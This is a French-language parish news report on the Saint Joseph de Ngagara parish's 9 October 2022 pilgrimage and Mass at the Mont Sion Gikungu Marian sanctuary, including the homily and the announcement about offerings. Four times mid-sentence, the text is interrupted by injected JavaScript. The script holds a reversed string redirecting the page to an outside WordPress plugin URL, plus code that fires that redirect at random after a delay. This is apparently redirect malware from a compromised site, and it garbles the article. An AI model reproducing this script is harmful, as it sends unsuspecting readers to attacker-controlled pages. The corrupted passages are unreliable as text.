Ce dimanche, 09 octobre 2022, la Paroisse saint Joseph de Ngagara a effectué un pèlerinage au Sanctuaire marial de la Reine de la paix et la réconciliation de Mont Sion Gikungu. Ces pèlerins venus en nombre considérable ont participé à la Messe de 10 heures célébrée par le Curé de la Paroisse de Ngagara, l’Abbé Déo, en concélébration avec le Recteur du Sanctuaire Mont Sion Gikungu, Père Longin NTIRANYIBAGIRA. Signalons que ce vingt-huitième Dimanche du Temps Ordinaire, la Messe de 10 heures n’a pas eu lieu à la Paroisse Ngagara.

Dans son mot d’accueil, le Recteur du Sanctuaire les a remerciés pour ce pèlerinage, un pèlerinage qui suit celui effectué par les pèlerins de Mont Sion Gikungu vers la Paroisse saint Joseph pendant l’année spéciale décrétée par le Pape comme dédiée à saint Joseph. Dieu fait des merveilles, s’exclame le Recteur. Au moment où nous nous apprêtons à célébrer le vingt-huitième anniversaire d’existence du Sanctuaire, voilà que ce vingt-huitième Dimanche du Temps Ordinaire année C, nous accueillons des pèlerins, signe que Dieu nous bénit.  Aujourd’hui, a annoncé le Père Longin NTIRANYIBAGIRA, toutes les offrandes qui seront collectées seront toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}données à la Paroisse Ngagara, laquelle annonce a été accueillie par des acclamations de joie. Signalons que cette Paroisse est en train d’ériger une nouvelle église spacieuse.

Retenons que les saintes Écritures du jour ont été tirées du deuxième livre des Rois ( 2 R 5,14-17), du Psaume responsorial (Ps 97 (98), 1, 2-3ab,3cd-4) chanté par un des membres de la chorale Sainte Famille qui a même animé en chants liturgiques cette Eucharistie, de la deuxième lettre de saint Paul apôtre à Timothée (2 Tm 2, 8-13) et de l’Évangile de Jésus Christ selon saint Luc (Lc 17, 11-19) et portaient toutes sur la foi.

Le Curé de la Paroisse Ngagara a d’abord entonné un chant invoquant le Saint-Esprit et a expliqué après le but de ce pèlerinage au tout début de son homélie. Chez eux, à la Paroisse Ngagara, c’est la veille qu’ils ont ouvert l’année pastorale et ils ont jugé bon de faire le pèlerinage le lendemain. Pour lui, le pèlerinage est source de bénédiction et beaucoup de ceux qui y ont pris part peuvent témoigner.

Chers frères et sœurs, Dimanche, c’est un jour de joie, a continué le célébrant. C’est un jour de joie parce que c’est le jour du Seigneur. Le jour où nous nous rencontrons pour prier le Seigneur et lui rendre grâce pour tous les bienfaits. Nous sommes toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc ici pour célébrer le Mystère pascal du Christ, se souvenir de son amour sans fin et incomparable jusqu’à être crucifié pour nous. Aujourd’hui, nous célébrons sa résurrection, sa victoire sur la mort. Christ est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc vivant et celui qui croit en Lui est lui aussi vivant. Croire en Christ c’est aussi accepter de mettre ses pieds là où Jésus a mis les siens. C’est en quelque sorte accepter un Vendredi saint dans sa vie, accepter ses souffrances, combattre le bon combat jusqu’à la fin à l’exemple du Christ. Il est ensuite revenu sur l’annonce du Père Recteur leur promettant toutes les offrandes de la messe de 10 heures. L’offrande qui plait au Seigneur c’est une offrande qui vient des mains propres, une offrande qui n’est pas tirée du vol ou du sang versé. Que ça soit seulement ceux qui savent que leur offrande est digne de ce nom qui fassent le déplacement le moment. Partant de là, il a prodigué des conseils aux fidèles sur comment ils toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent vivre leur chrétienté notamment en montrant aux autres un bon exemple.

 Vers la fin de l’Eucharistie, les chrétiens de la Paroisse Ngagara ont offert aux Pèlerins de Mont Sion Gikungu l’image de Saint Joseph. Signalons qu’à la fin de la Messe, il y a eu procession vers le Sanctuaire pour consacrer à la Vierge Marie la construction en cours de l’église saint Joseph et l’image reçue faisait partie de la procession.